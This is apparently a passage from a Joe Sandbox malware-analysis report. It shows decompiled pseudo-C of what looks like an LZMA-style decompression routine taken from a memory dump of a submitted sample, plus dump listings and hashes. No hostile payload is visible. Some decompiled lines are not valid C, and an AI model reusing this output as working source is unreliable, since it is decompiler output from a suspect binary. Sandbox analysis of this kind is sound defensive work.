							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405E9D, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
